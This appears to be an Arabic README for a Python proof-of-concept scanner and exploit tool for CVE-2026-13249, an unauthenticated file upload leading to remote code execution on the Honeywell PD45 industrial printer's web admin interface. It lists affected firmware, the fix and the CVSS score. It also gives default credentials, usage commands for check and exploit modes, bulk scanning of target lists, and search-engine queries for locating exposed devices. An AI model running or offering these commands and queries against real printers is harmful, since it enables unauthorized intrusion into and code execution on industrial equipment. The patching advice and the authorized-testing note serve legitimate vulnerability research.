
تحميل ملف عشوائي بدون مصادقة على واجهة إدارة الويب لـ Honeywell PD45 (البرنامج الثابت F10.19.010040–قبل F10.22.030745) مما يؤدي إلى RCE. أداة Python للفحص/الاستغلال PoC
Python 3 PoC لـ CVE-2026-13249 — واجهة إدارة الويب لطابعة Honeywell PD45 Industrial Printer.
CVE-2026-13249 — الإصدار الثابت F10.19.010040 حتى ما قبل F10.22.030745 يكشف عن رفع ملفات عشوائي بدون مصادقة على واجهة إدارة الويب HTTPS للطابعة (CWE-306، CWE-434، CWE-78). يمكن للمهاجمين رفع ملفات يتحكمون بها قد يتم تنفيذها كأوامر على الجهاز (RCE). تقييم CVSS 9.8 حرج (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). الإصلاح: الترقية إلى F10.22.030745 أو أحدث؛ وتقييد واجهة الويب على شبكات الإدارة الموثوقة.
صفحة PoC: https://pocbit.org/pocs/cve-2026-13249
المورّد: إشعارات أمان منتجات Honeywell
الفهرس: https://pocbit.org/pocs/
| المنتج | Honeywell PD45 Industrial Printer |
| الإصدار الثابت المتأثر | ≥ F10.19.010040 و < F10.22.030745 |
| الإصدار الثابت المُصلَّح | F10.22.030745 |
| الواجهة | إدارة الويب (HTTPS، بيانات الاعتماد الافتراضية موثّقة كـ itadmin / pass لتدفقات المصادقة) |
| التأثير | رفع بدون مصادقة → RCE |
لا ينشر إشعار Honeywell العام عنوان URI الدقيق للرفع بدون مصادقة. يقوم هذا الـ PoC بـ بصمة الجهاز والإصدار الثابت، واختياريًا يجمع النماذج متعددة الأجزاء تحت /Manage/ و /Services/، ويدعم --upload-url من الالتقاط الخاص بك على وحدة مخبرية.
pip install -r requirements.txt
python poc.py -u https://10.10.10.50 --mode check
python poc.py -u https://10.10.10.50 --mode check --upload-probe
python poc.py -u https://10.10.10.50 --mode exploit \
--upload-url "https://10.10.10.50/..." --field file \
--verify-url "https://10.10.10.50/pocbit_13249.txt"
python poc.py --list targets.example.txt --mode check -j 8
title="Honeywell" && body="PD45"
ssl.cert.subject.cn="PD45"
الاختبار المصرّح به على الطابعات التي تملكها أو لديك إذن صريح بتقييمها. يقوم --upload-probe / --mode exploit بكتابة بيانات على الجهاز الهدف.